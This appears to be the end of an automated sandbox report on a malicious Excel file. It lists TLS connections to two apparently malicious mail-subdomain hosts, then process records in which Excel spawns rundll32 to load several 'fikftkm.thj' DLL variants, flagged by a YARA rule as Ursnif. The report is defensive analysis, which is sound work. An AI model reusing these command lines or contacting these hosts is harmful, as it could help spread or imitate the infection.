                                                                                                                                                                                    Apr 6, 2021 18:43:17.306977987 CEST5.100.155.169443192.168.2.349718CN=mail.ponchokhana.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 03 22:31:59 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 01 23:31:59 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                    Apr 6, 2021 18:43:18.063465118 CEST50.116.95.68443192.168.2.349720CN=mail.springbedspetroleum.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Apr 02 00:17:53 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Thu Jul 01 00:17:53 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                    Statistics

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:43:07
                                                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                    Imagebase:0x9c0000
                                                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:43:18
                                                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32 ..\fikftkm.thj,DllRegisterServer
                                                                                                                                                                                    Imagebase:0x50000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:43:19
                                                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32 ..\fikftkm.thj1,DllRegisterServer
                                                                                                                                                                                    Imagebase:0x50000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.270814494.00000000041A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:43:33
                                                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32 ..\fikftkm.thj2,DllRegisterServer
                                                                                                                                                                                    Imagebase:0x50000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:43:34
                                                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32 ..\fikftkm.thj3,DllRegisterServer
                                                                                                                                                                                    Imagebase:0x50000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:43:34
                                                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32 ..\fikftkm.thj4,DllRegisterServer
                                                                                                                                                                                    Imagebase:0x50000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                    Reset < >